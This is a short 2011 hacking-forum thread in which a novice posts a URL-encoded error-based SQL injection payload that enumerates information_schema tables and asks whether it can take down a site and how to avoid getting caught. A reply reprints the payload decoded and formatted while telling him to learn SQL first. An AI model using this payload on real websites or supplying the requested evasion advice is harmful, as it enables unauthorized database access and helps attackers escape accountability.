Pages: [1]

Author Topic: SQL injection question  (Read 1252 times)

0 Members and 1 Guest are viewing this topic.

Offline Santa

  • Serf
  • *
  • Posts: 27
  • Cookies: -9
  • shit happens
    • View Profile
SQL injection question
« on: November 06, 2011, 06:43:30 pm »
Ok guys i have a question
will the SQL injection

 index.php?lvl=categories&id=453+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6F63696D%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1


work to take down a website site such as ( www.evilzone.org)
if so what security measures should i take so i dont get caught doing this and what should i download to keep me safe from anything else
« Last Edit: November 06, 2011, 06:45:57 pm by Factionwars »
Report to moderator   Logged

Offline ca0s

  • VIP
  • Sir
  • *
  • Posts: 432
  • Cookies: 53
    • View Profile
    • ka0labs #
Re: SQL injection question
« Reply #1 on: November 06, 2011, 06:54:12 pm »
Do you really understand how SQLi works? Do you even know SQL? And how it is like accessing to any website with its correspondent logging?
If so, well, you will know the answer to your question. If not, go and learn. Ande made a nice tut about SQLi. There are a lot of basic manuals of SQL, use google.
Also
Code: [Select]
(select 1 from
  (select count(*),
  concat(
    (select
      (select
        (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F63696D)
    ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x
    from `information_schema`.tables group by x)a) and 1=1
Ohmy.
Report to moderator   Logged

Offline Santa

  • Serf
  • *
  • Posts: 27
  • Cookies: -9
  • shit happens
    • View Profile
Re: SQL injection question
« Reply #2 on: November 06, 2011, 06:59:50 pm »
Quote from: ca0s on November 06, 2011, 06:54:12 pm
Do you really understand how SQLi works? Do you even know SQL? And how it is like accessing to any website with its correspondent logging?
If so, well, you will know the answer to your question. If not, go and learn. Ande made a nice tut about SQLi. There are a lot of basic manuals of SQL, use google.
Also
Code: [Select]
(select 1 from
  (select count(*),
  concat(
    (select
      (select
        (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F63696D)
    ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x
    from `information_schema`.tables group by x)a) and 1=1
Ohmy.

No i dont but I want to learn I will check out andes's post when I have time
« Last Edit: November 06, 2011, 07:00:23 pm by Santa »
Report to moderator   Logged
Pages: [1]